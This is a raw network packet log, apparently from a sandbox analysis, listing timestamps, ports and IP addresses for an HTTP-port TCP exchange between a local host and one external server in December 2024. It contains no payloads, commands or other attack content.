Dec 13, 2024 01:37:12.055197001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.055310965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.055394888 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.056082964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.056226015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.056303978 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.057018042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.057106018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.057184935 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.057893038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.058005095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.058082104 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.058813095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.058943033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.059020996 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.059717894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.059823036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.059900045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.060630083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.060745001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.060820103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.061937094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.062033892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.062114000 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.062522888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.062657118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.062731981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.063386917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.063494921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.063575983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.064275026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.064347029 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.064424038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.065191984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.065313101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.065392017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.066083908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.066212893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.066291094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.067017078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.067127943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.067300081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.067919016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.067980051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.068053007 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.068839073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.068973064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.069046021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.069715977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.069850922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.069921970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.070655107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.070785046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.070854902 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.071551085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.071700096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.071770906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.072479963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.072592974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.072664976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.073374033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.073493958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.073568106 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.074273109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.074393034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.074464083 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.075201988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.075320005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.075393915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.076073885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.129664898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.220313072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.220396042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.220474005 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.220696926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.220841885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.220911980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.221673965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.221774101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.221844912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.222523928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.222611904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.222680092 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.223423004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.223543882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.223613977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.224428892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.224596977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.224670887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.225243092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.225353956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.225425005 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.226166010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.226274967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.226345062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.227055073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.227170944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.227240086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.227972984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.228075981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.228147984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.228914022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.228940010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.229015112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.229789972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.229888916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.229959011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.230735064 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.230834961 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.230904102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.231615067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.231722116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.231792927 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.232523918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.232647896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.232721090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.233422995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.233553886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.233623981 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.234347105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.234440088 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.234535933 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.235249996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.235363007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.235434055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.236175060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.236293077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.236365080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.237070084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.237184048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.237257004 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.237972021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.238101006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.238174915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.238883018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.238998890 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.239109993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.239790916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.239897966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.239969969 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.240704060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.240827084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.240897894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.241605043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.241727114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.241797924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.242516994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.242633104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.242718935 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.243463039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.243583918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.243654966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.244357109 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.244491100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.244563103 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.245246887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.245358944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.245430946 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.246166945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.246279955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.246349096 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.247072935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.247195005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.247271061 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.247973919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.248076916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.248158932 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.248883009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.249057055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.249131918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.249802113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.249919891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.249991894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.250710011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.250838041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.250910044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.251612902 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.251718998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.251790047 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.252525091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.252648115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.252722979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.253433943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.253540039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.253622055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.254347086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.254461050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.254559040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.255280972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.255378962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.256190062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.256262064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.256299019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.256370068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.257076025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.257198095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.257273912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.257986069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.258088112 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.258162022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.258893967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.259002924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.259074926 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.259799957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.259919882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.259991884 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.260724068 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.260837078 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.260916948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.261616945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.261744022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.261816025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.262526989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.262666941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.262742043 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.263439894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.263559103 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.263633013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.264345884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.264465094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.264560938 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.265261889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.265337944 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.265410900 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.266196012 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.266308069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.266381979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.267082930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.267188072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.267261028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.267927885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.317377090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.412218094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.412311077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.412409067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.412596941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.412636042 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.412713051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.413517952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.413638115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.413713932 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.414401054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.414520025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.414589882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.415334940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.415432930 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.415502071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.416220903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.416340113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.416412115 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.417165041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.417263985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.417340040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.418051004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.418179989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.418251038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.418953896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.419063091 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.419132948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.419881105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.419969082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.420041084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.420764923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.420885086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.420954943 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.421673059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.421791077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.421861887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.422594070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.422709942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.422780991 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.423504114 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.423626900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.423697948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.424420118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.424552917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.424623966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.425316095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.425441027 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.425513983 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.426242113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.426386118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.426457882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.427124977 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.427248955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.427325964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.428044081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.428158045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.428227901 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.428966999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.429080009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.429152012 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.429871082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.429987907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.430058002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.430793047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.430906057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.430975914 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.431694031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.431794882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.431865931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.432600975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.432729959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.432801962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.433514118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.433650970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.433718920 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.434448004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.434552908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.434619904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.435332060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.435446024 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.435516119 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.436242104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.436291933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.436357021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.437150002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.437179089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.437246084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.438054085 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.438170910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.438239098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.438970089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.439095020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.439161062 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.439881086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.439996004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.440063953 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.440782070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.440910101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.440973997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.441715956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.441842079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.441910028 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.442611933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.442732096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.442801952 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:12.443507910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.443634033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:12.443701982 CET	49707	80	192.168.2.5	185.81.68.147
